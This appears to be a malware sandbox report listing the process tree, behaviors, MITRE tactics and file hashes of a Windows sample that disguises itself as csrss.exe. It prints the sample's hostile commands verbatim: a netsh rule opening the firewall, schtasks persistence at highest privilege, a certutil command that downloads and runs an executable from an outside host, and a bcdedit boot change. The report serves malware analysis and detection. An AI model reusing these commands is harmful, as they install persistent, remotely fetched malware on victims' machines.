    PID 1292 wrote to memory of 1696 | 1292 | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe | cmd.exe
    PID 1696 wrote to memory of 820 | 1696 | cmd.exe | netsh.exe
    PID 1696 wrote to memory of 820 | 1696 | cmd.exe | netsh.exe
    PID 1696 wrote to memory of 820 | 1696 | cmd.exe | netsh.exe
    PID 1292 wrote to memory of 1764 | 1292 | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe | csrss.exe
    PID 1292 wrote to memory of 1764 | 1292 | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe | csrss.exe
    PID 1292 wrote to memory of 1764 | 1292 | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe | csrss.exe
    PID 1292 wrote to memory of 1764 | 1292 | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe | csrss.exe
    PID 1764 wrote to memory of 1412 | 1764 | csrss.exe | bcdedit.exe
    PID 1764 wrote to memory of 1412 | 1764 | csrss.exe | bcdedit.exe
    PID 1764 wrote to memory of 1412 | 1764 | csrss.exe | bcdedit.exe
    PID 1764 wrote to memory of 1412 | 1764 | csrss.exe | bcdedit.exe
Processes 10
  • C:\Users\Admin\AppData\Local\Temp\6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    "C:\Users\Admin\AppData\Local\Temp\6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe"
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    PID:1120
    • C:\Users\Admin\AppData\Local\Temp\6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
      "C:\Users\Admin\AppData\Local\Temp\6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe"
      Loads dropped DLL
      Windows security modification
      Adds Run key to start application
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1292
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          Modifies data under HKEY_USERS
          PID:820
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        Executes dropped EXE
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:1764
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          Creates scheduled task(s)
          PID:1032
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://10gamestop.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          Creates scheduled task(s)
          PID:1216
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          Executes dropped EXE
          Loads dropped DLL
          PID:580
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          Modifies boot configuration data using bcdedit
          PID:1412
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220521002659.log C:\Windows\Logs\CBS\CbsPersist_20220521002659.cab
    Drops file in Windows directory
    PID:1184
Network
MITRE ATT&CK Matrix
Collection, Command and Control, Credential Access, Discovery, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Privilege Escalation
Downloads
                    • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

                      MD5

                      13aaafe14eb60d6a718230e82c671d57

                      SHA1

                      e039dd924d12f264521b8e689426fb7ca95a0a7b

                      SHA256

                      f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

                      SHA512

                      ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

                    • C:\Windows\rss\csrss.exe

                      MD5

                      c40e14338592240c54c328318963b3bb

                      SHA1

                      0026ef8f4f8baaeda070e1f306e2a7618a8b2e6d

                      SHA256

                      6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a

                      SHA512

                      292bb0075078174a848ee6a7ce74654bcfbdb1ba590461c9cc3203ae9d0286a5965c34ff6b317d05372e517238c504aeb0dc1ae9523ca6a311ec27c6583aab95

                    • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

                      MD5

                      13aaafe14eb60d6a718230e82c671d57

                      SHA1

                      e039dd924d12f264521b8e689426fb7ca95a0a7b

                      SHA256

                      f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

                      SHA512

                      ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

                    • \Users\Admin\AppData\Local\Temp\dbghelp.dll

                      MD5

                      f0616fa8bc54ece07e3107057f74e4db

                      SHA1

                      b33995c4f9a004b7d806c4bb36040ee844781fca

                      SHA256

                      6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

                      SHA512

                      15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

                    • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                      MD5

                      1afff8d5352aecef2ecd47ffa02d7f7d

                      SHA1

                      8b115b84efdb3a1b87f750d35822b2609e665bef

                      SHA256

                      c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

                      SHA512

                      e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

                    • \Users\Admin\AppData\Local\Temp\osloader.exe

                      MD5

                      e2f68dc7fbd6e0bf031ca3809a739346

                      SHA1

                      9c35494898e65c8a62887f28e04c0359ab6f63f5

                      SHA256

                      b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

                      SHA512

                      26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

                    • \Users\Admin\AppData\Local\Temp\symsrv.dll

                      MD5

                      5c399d34d8dc01741269ff1f1aca7554

                      SHA1

                      e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

                      SHA256

                      e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

                      SHA512

                      8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

                    • \Windows\rss\csrss.exe

                      MD5

                      c40e14338592240c54c328318963b3bb

                      SHA1

                      0026ef8f4f8baaeda070e1f306e2a7618a8b2e6d

                      SHA256

                      6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a

                      SHA512

                      292bb0075078174a848ee6a7ce74654bcfbdb1ba590461c9cc3203ae9d0286a5965c34ff6b317d05372e517238c504aeb0dc1ae9523ca6a311ec27c6583aab95
